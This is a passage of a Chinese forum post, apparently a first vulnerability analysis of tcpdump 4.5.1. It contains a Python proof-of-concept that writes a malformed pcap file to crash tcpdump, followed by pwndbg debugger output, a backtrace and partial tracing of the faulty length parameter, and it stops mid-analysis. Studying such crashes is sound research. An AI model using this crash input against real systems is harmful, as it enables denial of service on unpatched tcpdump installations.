第一次做漏洞分析,有什么错误的地方欢迎各位提出

分析环境

  • ubuntu16.04 x86_64

  • gdb with pwndbg

  • tcpdump 4.5.1

  • poc

编译安装tcpdump

$ sudo apt-get install libpcap-dev
$ dpkg -l libpcap-dev
$ wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz
$ tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz
$ cd tcpdump-4.5.1/
$ ./configure
$ make
$ sudo make install

利用poc生成pcap文件

poc:

from subprocess import call
from shlex import split
from time import sleep
def crash():
    command = 'tcpdump -r crash'
    buffer     =   '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
    buffer     +=  '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
    buffer     +=  '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
    buffer     +=  '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
    buffer     +=  "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
    buffer     +=  "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
    buffer     +=  '\x00\x00\x00\x00\x01\x03\x03\x04'
    with open('crash', 'w+b') as file:
        file.write(buffer)
    try:
        call(split(command))
        print("Exploit successful!             ")
    except:
        print("Error: Something has gone wrong!")
def main():
    print("Author:   David Silveiro                           ")
    print("   tcpdump version 4.5.1 Access Violation Crash    ")
    sleep(2)
    crash()
if __name__ == "__main__":
    main()

调试

读入生成的pcap文件,并运行

Program received signal SIGSEGV, Segmentation fault.

hex_and_ascii_print_with_offset (ident=0x47fe57 "\n\t", cp=0x843000 <error: Cannot access memory at address 0x843000>, length=4294967283, oset=133744) at ./print-ascii.c:91

91    s2 = *cp++;

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA

───────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────
 RAX  0x2e
 RBX  0x2e
 RCX  0x0
 RDX  0x7ffff79425e0 (_nl_C_LC_CTYPE_class+256) ◂— add    al, byte ptr [rax]
 RDI  0x7fffffffcf90 ◂— 0x3030203030303020 (' 0000 00')
 RSI  0x0
 R8   0x5a5a5a5a5a5a5a5a ('ZZZZZZZZ')
 R9   0x0
 R10  0x1
 R11  0x0
 R12  0x843001
 R13  0x7fffffffcfa9 ◂— 0x3030203030303000
 R14  0x5
 R15  0x7fffffffcfca ◂— 0x2e2e2e2e2e2e /* '......' */
 RBP  0x2e
 RSP  0x7fffffffcf70 ◂— 0x0
 RIP  0x40c8b7 (hex_and_ascii_print_with_offset+103) ◂— movzx  ebx, byte ptr [r12 - 1]
────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────

 ► 0x40c8b7 <hex_and_ascii_print_with_offset+103>    movzx  ebx, byte ptr [r12 - 1]
   0x40c8bd <hex_and_ascii_print_with_offset+109>    mov    rax, r13
   0x40c8c0 <hex_and_ascii_print_with_offset+112>    mov    esi, 0x29
   0x40c8c5 <hex_and_ascii_print_with_offset+117>    sub    rax, rdi
   0x40c8c8 <hex_and_ascii_print_with_offset+120>    sub    rsp, 8
   0x40c8cc <hex_and_ascii_print_with_offset+124>    mov    r8d, 0x473d00
   0x40c8d2 <hex_and_ascii_print_with_offset+130>    sub    rsi, rax
   0x40c8d5 <hex_and_ascii_print_with_offset+133>    mov    ecx, 0x29
   0x40c8da <hex_and_ascii_print_with_offset+138>    mov    edx, 1
   0x40c8df <hex_and_ascii_print_with_offset+143>    mov    rdi, r13
   0x40c8e2 <hex_and_ascii_print_with_offset+146>    mov    ebp, r9d
─────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────
In file: /home/kaka/DEBUG/tcpdump-4.5.1/print-ascii.c
   86 nshorts = length / sizeof(u_short);
   87 i = 0;
   88 hsp = hexstuff; asp = asciistuff;
   89 while (--nshorts >= 0) {
   90 s1 = *cp++;
 ► 91 s2 = *cp++;
   92 (void)snprintf(hsp, sizeof(hexstuff) - (hsp - hexstuff),
   93     " %02x%02x", s1, s2);
   94 hsp += HEXDUMP_HEXSTUFF_PER_SHORT;
   95 *(asp++) = (isgraph(s1) ? s1 : '.');
   96 *(asp++) = (isgraph(s2) ? s2 : '.');
─────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────
00:0000│ rsp    0x7fffffffcf70 ◂— 0x0
01:0008│        0x7fffffffcf78 ◂— 0x100822577
02:0010│        0x7fffffffcf80 —▸ 0x47fe57 ◂— or     cl, byte ptr [rcx] /* '\n\t' */
03:0018│        0x7fffffffcf88 ◂— 0xfffffff300020a70
04:0020│ rdi    0x7fffffffcf90 ◂— 0x3030203030303020 (' 0000 00')
05:0028│        0x7fffffffcf98 ◂— 0x2030303030203030 ('00 0000 ')
06:0030│        0x7fffffffcfa0 ◂— '0000 0000'
07:0038│ r13-1  0x7fffffffcfa8 ◂— 0x3020303030300030 /* '0' */

从崩溃信息来看,问题出现在print-ascii.c文件中,访问到了一个不允许访问的地址。再结合源码信息可知,指针cp在自加的过程中访问到了一个没有权限访问的地址,因为这是写在一个while循环里,也就是是说nshorts的值偏大,再看nshorts怎么来的,由此nshorts = length / sizeof(u_short);可知,可能是函数传入的参数length没有控制大小导致,因此目标就是追踪length是如何传入的。

通过bt回溯一下调用情况

pwndbg> bt
#0  hex_and_ascii_print_with_offset (ident=0x47fe57 "\n\t", cp=0x843000 <error: Cannot access memory at address 0x843000>, length=4294967283, oset=133744) at ./print-ascii.c:91
#1  0x000000000040aa7d in ieee802_15_4_if_print (ndo=0x820140 <Gndo>, h=<optimized out>, p=<optimized out>) at ./print-802_15_4.c:180
#2  0x000000000045bb9f in print_packet (user=0x7fffffffd2e0 "@\001\202", h=0x7fffffffd1d0, sp=0x822570 "@\377") at ./tcpdump.c:1950
#3  0x00007ffff7bb3ac4 in ?? () from /usr/lib/x86_64-linux-gnu/libpcap.so.0.8
#4  0x00007ffff7ba41cf in pcap_loop () from /usr/lib/x86_64-linux-gnu/libpcap.so.0.8
#5  0x0000000000403f27 in main (argc=argc@entry=3, argv=argv@entry=0x7fffffffe548) at ./tcpdump.c:1569
#6  0x00007ffff77eb830 in __libc_start_main (main=0x4030e0 <main>, argc=3, argv=0x7fffffffe548, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe538) at ../csu/libc-start.c:291
#7  0x0000000000404cd9 in _start ()

追踪一下从main函数开始,每个函数的执行流程

pcap_loop()

► 0x403f22 <main+3650>    call   pcap_loop@plt <0x4027a0>
        rdi: 0x8222c0 —▸ 0x7ffff7bb3a40 ◂— push   r15
        rsi: 0xffffffff
        rdx: 0x45bb50 (print_packet) ◂— push   r12
        rcx: 0x7fffffffcbd0 —▸ 0x820140 (Gndo) ◂— 0x0

在跟进pcap_loop()函数的过程中,遇到一处call,步入看看

► 0x7ffff7ba41ca <pcap_loop+42>    call   0x7ffff7bb3a40

来到了bpf_filter函数,注意第三个参数就是我们传入crash数据包的len,然而到后面发现,其实与这个值无关

► 0x7ffff7bb3aa9    call   bpf_filter <0x7ffff7bba870>
        rdi: 0x825c30 ◂— 0x4900000006
        rsi: 0x822570 ◂— 0x7f72a00600ff40
        rdx: 0x379c3c00
        rcx: 0x8
点击收藏 | 0 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖